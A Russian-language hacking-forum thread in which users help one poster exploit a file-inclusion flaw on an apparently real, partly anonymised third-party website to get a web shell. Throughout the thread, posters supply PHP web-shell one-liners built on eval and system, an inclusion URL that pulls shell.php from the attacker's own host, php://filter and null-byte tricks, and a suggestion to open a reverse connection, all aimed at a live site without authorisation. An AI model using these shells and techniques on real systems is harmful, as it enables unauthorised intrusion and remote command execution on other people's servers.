RFI inclusion

[kali]

привет!пытаюь удаленно грузить шелл .
1 знаю что расширение должно\может быть не пшп, на моем сервере не должно крутиться пшп
пробую : vuln.com/papka/vuln/php?=myhost/pub/loce.php?=ls
итог:
Warning: require(include/myhost/pub/loce.php?cmd=ls.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-vuln.com/public_html/include/_gestore-multilingua.php on line 14

Warning: require(include/myhost/pub/loce.php?cmd=ls.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-vuln.com/public_html/include/_gestore-multilingua.php on line 14

Fatal error: require(): Failed opening required 'include/myhost.com/pub/loce.php?cmd=ls.php' (include_path='.:/usr/local/php-7.2.11-flock/lib/php') in /var/sites/a/angeli-di-montefiore.de/public_html/include/_gestore-multilingua.php on line 14

в loce.php у меня следущий код:
<?php eval($_GET["cmd"]); ?>

и вариаций этого мини шелла нашел на хсс больше 8 и все их попробовал подгрузить т.к. не силен в пшп и всегда эта ошибка
также пробовал в тхт формате
спасибо всем за ранее за помощь

 

[BlackHawk]

Код в loce.php вызывает не bash интерпретатор, а указанный php файл
Warning: require(include/myhost/pub/loce.php?cmd=ls.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-vuln.com/public_html/include/_gestore-multilingua.php on line 14
Из еррора видно, что система хочет вызвать файл ls.php, но не может его найти

 

[rlz]

Based on the error code, we understand the code on back-end could be something similar to

var/sites/a/angeli-di-montefiore.de/public_html/include/ $_GET["cmd"] _gestore-multilingua.php

Where CMD = en, de, fr, etc

If you can try with null byte also try using filter php wrapper.

Using php://filter for local file inclusion | Application Security

PHP filters can be used to prevent PHP code executing when used in Local File Inclusion attacks.

www.idontplaydarts.com

awesome-security-trivia/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md at master · qazbnm456/awesome-security-trivia

🤙 Security Trivia that rare people know. Contribute to qazbnm456/awesome-security-trivia development by creating an account on GitHub.

github.com

 

[rtfm]

>> <?php eval($_GET["cmd"]); ?>

eval выполняет PHP код, а ты пытаешься в нем выполнить команду оси... Короче говоря вместо eval используй system. Или же в параметре cmd передавай php код.

P.S не все пути потер

 

[kali]

Код в loce.php вызывает не bash интерпретатор, а указанный php файл
Warning: require(include/myhost/pub/loce.php?cmd=ls.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-vuln.com/public_html/include/_gestore-multilingua.php on line 14
Из еррора видно, что система хочет вызвать файл ls.php, но не может его найти

>> <?php eval($_GET["cmd"]); ?>

eval выполняет PHP код, а ты пытаешься в нем выполнить команду оси... Короче говоря вместо eval используй system. Или же в параметре cmd передавай php код.

P.S не все пути потер

поменял eval на system
иду vuln.com/include/_gestore-multilingua.php?=myhost/pub/loce.php?=ls

там опять Warning: require(include/en.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-montefiore.de/public_html/include/_gestore-multilingua.php on line 14
иду
vuln.com/include/en.php?=myhost/pub/loce.php?=ls
вижу пустую белую страницу,ничего не происходит
в чем проблема пчему команда не исполнена?

 

[rtfm]

Сложно сказать, но разложив карты таро могу предположить что до инклуда твоего скрипта может вызывается ob_start, кэширующий весь вывод в буфер. Попробуй исправить свой шелл на:

<?php while(@ob_end_clean); exit(system($_GET["cmd"])); ?>

 

[kali]

Сложно сказать, но разложив карты таро могу предположить что до инклуда твоего скрипта может вызывается ob_start, кэширующий весь вывод в буфер. Попробуй исправить свой шелл на:

<?php while(@ob_end_clean); exit(system($_GET["cmd"])); ?>

ничего не изменилось все так же,ты имеешь ввиду что я мало информации предоставил,раз тебе пришлось достать калоду таро?
что еще добавить для удачного исхода?

 

[BabaDook]

Долго вкуривал в тему, вкуривал и так не вкурил, что такое RFI - Remote File Inclusion Что в переводе. примерно
Удаленное включение файлов. Спасибо переводчику. а вот что такое RFI inclusion даже гугл потерялся. Ну, да ладно.

1 знаю что расширение должно\может быть не пшп, на моем сервере не должно крутиться пшп
пробую : vuln.com/papka/vuln/php?=myhost/pub/loce.php?=ls
Да, хоть питон грузите. " на моем сервере не должно крутиться пшп" Это ещё почему?
И кстати, он пишет про потоки.
Warning: require(include/myhost/pub/loce.php?cmd=ls.php): failed to open stream: No such file or directory in /var/sites/a/angeli-di-vuln.com/public_html/include/_gestore-multilingua.php on line 14
Может попробуйте sileTarget?file.php?url=http://Mysite/shell.php
у себя на сервере echo "<?php system($_GET['cmd']);?>" > /var/www/html/shell.php

И кстати, да. Кинь phpinfo сайта.
п.с. Меня чё-та реквери смущает.
Я чё та подумал... нафига тебе Ваньку валять, делай сразу обратное соединение.

 

[kali]

Долго вкуривал в тему, вкуривал и так не вкурил, что такое RFI - Remote File Inclusion Что в переводе. примерно
Удаленное включение файлов. Спасибо переводчику. а вот что такое RFI inclusion даже гугл потерялся. Ну, да ладно.

каюсь ошибся при создании темы,но сути это не меняет надеюсь все поняли)

Да, хоть питон грузите. " на моем сервере не должно крутиться пшп" Это ещё почему?

потому что этот скрипт исполнится на нашем сервере, мы же пробуем на таргет-сервере (это вычитал в статьях,прочитал их уже вагон) но на практике все пока вот так)

И кстати, он пишет про потоки.

создает поток в котором файл по этому пути (не может найти)

Может попробуйте sileTarget?file.php?url=http://Mysite/shell.php
у себя на сервере echo "<?php system($_GET['cmd']);?>" > /var/www/html/shell.php

пробовал конечно ,как я уже не пробовал ыы)когда пойму в чем дело до потолка буду прыгать)
кстате почему у файла file.php? параметр url
но и с таким параметром пустая страница

И кстати, да. Кинь phpinfo сайта.

каким образом? при всех моих попытках белая страница......

п.с. Меня чё-та реквери смущает.

можно подробнее что смушает? рекавери?

 

[BabaDook]

каюсь ошибся при создании темы,но сути это не меняет надеюсь все поняли)

потому что этот скрипт исполнится на нашем сервере, мы же пробуем на таргет-сервере (это вычитал в статьях,прочитал их уже вагон) но на практике все пока вот так)

создает поток в котором файл по этому пути (не может найти)

пробовал конечно ,как я уже не пробовал ыы)когда пойму в чем дело до потолка буду прыгать)
кстате почему у файла file.php? параметр url
но и с таким параметром пустая страница


каким образом? при всех моих попытках белая страница......

можно подробнее что смушает? рекавери?

А с чего ты взял что там RFI?

 

[hxr7mk]

все верно сверху пишут, для начала посмотри phpinfo. Для rfi нужно:
allow_url_fopen = On
allow_url_include = On
Если одно из двух Off, то ничего не выйдет. Если не вкуриваешь разверни у себя любой уязвимый ап и посмотри как это работает в завимимости от разных php.ini конфигов. Это лучше, чем в слепую хуярить сайты.

 

[guwewuporu]

Fatal error: require(): Failed opening required 'include/myhost.com/pub/loce.php?cmd=ls.php' (include_path='.:/usr/local/php-7.2.11-flock/lib/php') in /var/sites/a/angeli-di-montefiore.de/public_html/include/_gestore-multilingua.php on line 14

А с чего вы взяли что у вас RFI? Для того чтоб была RFI нужно что ничего выше вашего запроса в вызове небыло, т.е в данном моменте должна отсутствовать папка include, таким образом данная бага становится LFI.

далее в самой баге, что то ломается внутри скрипта и падает вызов:

CASE di RUDY – Vacanza – Montefiore dell'Aso – Ostuni

angeli-di-montefiore.de

т.е тут лучше бы заглянуть в исходник, чтоб понять принцип алгоритма